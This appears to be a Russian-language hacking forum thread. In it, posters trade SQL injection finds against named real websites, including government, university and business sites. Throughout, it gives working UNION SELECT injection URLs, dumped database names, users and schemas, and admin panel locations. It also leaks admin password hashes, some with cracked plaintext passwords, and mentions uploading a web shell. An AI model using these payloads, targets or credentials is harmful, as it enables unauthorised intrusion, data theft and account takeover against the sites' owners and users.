Вот что нашел - http://www.stumptuous.com/gallery2/main.php?g2_view=core.UserAdmin&g2_subView=core.UserLogin&g2_return=main.php%3F&&g2_returnName=album
Files.exe.org.ua без вывода ? что кто думает ? Climb.com.ua Roxo.kiev.ua Food.a.ua Alltxt.org.ua Viptravel.com.ua
www.docka.irkutskcar.ru VERSION(): 5.0.51a-community-log USER(): irkutskc_bkv@localhost DATABASE(): irkutskc_doska Список таблиц-столбцов: Code: ******************************* wzb_cat ------------------------------- cat name parent count_items description picture total_items ******************************* wzb_details ------------------------------- action avtor cat city cpo date description details email exp_date ip name period phone photo picture pwd thumbnail title url view ******************************* wzb_wish ------------------------------- ids nums ******************************* Вывести список юзеров с паролями: Админка:
EDU таблицы не подобрал, влом было долго копаться. Database Version: 4.0.13 Database name: lila User name: [email protected]
Всероссийская Ипотечная Сеть НБИК DATABASE(): lipnbikr_spb DATABASE(): lipnbikr_lipetck DATABASE(): lipnbikr_kursk DATABASE(): lipnbikr_sirius Одинаковые для всех сайтов: VERSION(): 5.0.51a-community-log USER(): lipnbikr_sergio@localhost
надо тему Антибояна важной сделать,а то так не удобно ----------------------------------------------------------------- Code: http://www.ccre.org/champs_activites_detail_news_en.htm?ID=963&idca=-3115+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.tables+limit+17,11/* Блин,Все таблицы: T_1005,T_1006,T_1007...итд Code: http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-3591+union+select+1,2,3,4,5,6,7/* -------------------------------------------------------------- Code: http://tjp.dergisi.org/text.php3?id=-362+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* 4 version
сегодня у нас .RU Koleso.Topof.ru - Информационный Ресурс о шинах, тесты шин - PR 4 topof:33d51f16ddaf72afb581e2a223c602a1 < 4f***... admin:6a8da7a52d4684cc61ee8ed6bcc25f06 < 00d9a26f Mtas.ru - PR 4 админка Teatrdoc.ru - PR 4 Viperson.ru - PR 4 Game-ost.ru - PR 4 Fondsk.ru - PR 4 Flirtanica.ru - PR 4
Code: http://www.rjb.csic.es/fichacurso.php?id=265 усе на мой взляд сделать тут больше не чего нельзя ( mysql 3 версии filepriv нема вообшем пусть будет для комплекта ) version()=3.23.58 user()[email protected] database()=batonico
Издательство Форум Медиа VERSION(): PostgreSQL 7.4.19 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.4.6 20060404 (Red Hat 3.4.6-9) CURRENT_DATABASE(): forummed_forummed CURRENT_USER: forummed Список таблиц: Code: applicable_roles check_constraints column_domain_usage column_privileges columns column_udt_usage constraint_column_usage constraint_table_usage data_type_privileges docfiles domain_constraints domains domain_udt_usage element_types enabled_roles forumbusket forumnews forumorders forumusers information_schema_catalog_name key_column_usage parameters partners pg_aggregate pg_am pg_amop pg_amproc pg_attrdef pg_attribute pg_cast pg_class pg_constraint pg_conversion pg_database pg_depend pg_description pg_group pg_index pg_indexes pg_inherits pg_language pg_largeobject pg_listener pg_locks pg_namespace pg_opclass pg_operator pg_proc pg_rewrite pg_rules pg_settings pg_stat_activity pg_stat_all_indexes pg_stat_all_tables pg_stat_database pg_statio_all_indexes pg_statio_all_sequences pg_statio_all_tables pg_statio_sys_indexes pg_statio_sys_sequences pg_statio_sys_tables pg_statio_user_indexes pg_statio_user_sequences pg_statio_user_tables pg_stats pg_stat_sys_indexes pg_stat_sys_tables pg_stat_user_indexes pg_stat_user_tables pg_tables pg_trigger pg_type pg_user pg_views referential_constraints role_column_grants role_routine_grants role_table_grants role_usage_grants routine_privileges routines rubr_section schemata secpasswd sendsubs spravochniks sql_features sql_implementation_info sql_languages sql_packages sql_sizing sql_sizing_profiles stats table_constraints table_privileges tables triggered_update_columns triggers usage_privileges view_column_usage views view_table_usage voting1 voting2 Столбцы: Code: ************************************* docfiles ------------------------------------- name namefile spr_id ************************************* forumbusket ------------------------------------- orderid productid qua ************************************* forumnews ------------------------------------- id news odate stat topic ************************************* forumorders ------------------------------------- cdate id ips refer uid ************************************* forumusers ------------------------------------- codefax codephone email fax fio firm id inn kpp login numb passwd persons phone region street subs subs_1 subs_2 subs_3 subs_4 to_do uraddress zip ************************************* partners ------------------------------------- id name refer ************************************* rubr_section ------------------------------------- numb rubr sec_file section stat ************************************* secpasswd ------------------------------------- cid files passwd ************************************* sendsubs ------------------------------------- cdate status substext theme ************************************* spravochniks ------------------------------------- aname aname2 anno cid compl isbn name oglav pages period pict price stat types ************************************* voting1 ------------------------------------- address bezprod1 bezprod2 bezprod3 businesslike contactgood convenient deliver email fax fio friendly helpfull highquality id kritik not_importunate operat phone practical uident useful valueformoney ************************************* voting2 ------------------------------------- address bezprod1 bezprod2 bezprod3 businesslike contactgood convenient deliver email fax fio friendly helpfull highquality id kritik not_importunate operat phone practical uident useful valueformoney ************************************* Выведем список юзеров: Выведем коды для доступа к зоне обновлений: Страница обновлений находится здесь: Дополнительные материалы к справочнику "ISO 9001": 267294 Дополнительные материалы к справочнику "Ответственность генерального директора": 464724 Дополнительные материалы к справочнику "Новое в Трудовом законодательстве": 167647 Дополнительные материалы к справочнику "Государственный и муниципальный заказ": 220665 Так же обновления безо всяких заморочек можно скачать отсюда: Просто интересная папка, доступная для просмотра: Админка:
http://www.monsun-biz.com/auctiondetails.php?id=-101462'+union+select+concat_ws(0x3A3a,id,username,password,created,lastlogin,level)+from+probid_admins/* http://www.monsun-biz.com/admin/login.php админка admin::a8954ce2b9264ae3a1e80e8f3cc211dc ::nitesH Кавычки не экранируются. Можно попробовать залить шелл. http://www.keylinedesigns.com/hosting.php?id=-5+union+select+version()/* http://admin.keylinedesigns.com/ 5.0.45-log adminUser -tbenson::*77EF3F8AA5E975577A3372CF87C8450F560F608C :: Jackass00
Fm.gov.lv - PR 6 mysql 4 - определил по ошибке information_schema.tables к mysql.user access denied поидее есть такая колонка.. Biodiversityscotland.gov.uk - PR 5 mysql 4 - определил по ошибке information_schema.tables Chuvprok.gov.ru - Прокуратура ЧП - PR 4
EDU вывод слева в меню file_priv=0 (( DB`s: Version: 5.0.37 Dbname: irsweb Username: [email protected]
Tuba.gov.tr - PR 6 5 ветка, смотрим таблицы достаем колонки из нужной таблы.. достаем данные..) admin:f1aacbce49efbd4edec3116379e28aae Armagh.gov.uk - PR 5 GG.gov.au - PR 5
Mbda.gov - PR 8 помогите разкурить..) Ltgov.state.tx.us - PR 6 Tangodata.gov.ar - PR 5 Ingushetiya.ru - Ингушетия.ру - PR 5 Riocuarto.gov.ar - PR 4 root:5b3f24b703c68ff2 aka PSIH - carthage.edu кароч почти полный доступ к универу)) там еще много колонок с паролями..
хм опять какая то бесполезная иньекция ))) sitiodeletras.com http://www.sitiodeletras.com/mostrar.php?lid=26228 Database Version: 5.0.41-community Database name: sitiodl_letras User name: sitiodl_letras@localhost cодержимое INFORMATION_SCHEMA.tables Code: _artistas 1 aid 2 nombre _canciones 1 lid 2 aid 3 did 4 artista 5 titulo 6 disco 7 letra 8 referencia 9 nick 10 comentarios 11 timestamp 12 activo table _discos 1 did 2 nombre badlyrics 1 artista 2 titulo 3 disco 4 timestamp 5 ip 6 referer 7 status known_as 1 inputname 2 realname notfound 1 creiterio 2 texto 3 timestamp 4 ip 5 estado status 1 value 2 descripcion
http://www.lilyandlotus.com/pages/set.php?id=-1/**/union/**/select/**/0,1,concat(user(),char(0),database(),char(0),version()),3,4/* amandamc_lilly@localhost amandamc_lilly 4.0.27-standard Забавная скуль: http://www.hanyawanita.com/sm.php?id=-1/**/union/**/select/**/user()/* вывод - в адресной строке через редирект)) hanyawan_userilg@localhost hanyawan_hwilgdb 4.1.22-standard http://www.eszapopan.com.mx/mapograma/machotes/sm.php?id=-1/**/union/**/select/**/user(),2,3,4,5,6/* bioalive_shadow@localhost 4.1.22-standard bioalive_main
